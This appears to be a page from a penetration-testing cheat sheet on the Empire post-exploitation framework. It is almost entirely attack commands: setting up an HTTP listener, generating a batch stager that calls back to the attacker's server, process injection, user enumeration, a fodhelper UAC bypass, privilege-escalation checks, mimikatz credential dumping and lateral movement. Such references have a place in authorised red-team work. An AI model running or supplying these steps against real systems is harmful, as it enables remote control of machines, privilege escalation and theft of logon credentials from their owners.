Empire

Basic

Launch HTTP Listener:

listeners
uselistener http
set Host x.x.x.x
set Port xx
execute
back

Set stager:

usestager windows/launcher_bat
set Listener http
execute

Then by default, the payload will be generated in /tmp/launcher.bat. When this bat is run on the target, it initializes a callback to Empire server. For example:

agents

Interact with the agent:

interact 28ZFLH7K

Things that you can do:

ps
psinject <listner> <pid>
usemodule <module>

Modules

Situational Awareness

Get users

usemodule situational_awareness/network/powerview/get_user
execute

Privilege Escalation

PowerUp

usemodule powershell/privesc/powerup/allchecks
execute

BypassUAC

usemodule privesc/bypassuac_fodhelper
set Listener http
execute

Credentials

Dump logon passwords:

usemodule credentials/mimikatz/logonpasswords
execute

The collected credential can be seen by using creds:

creds

Lateral Movement

usemodule powershell/lateral_movement/<technique>

PreviousEnumeration NextWeaponized Office Docs

Last updated 4 years ago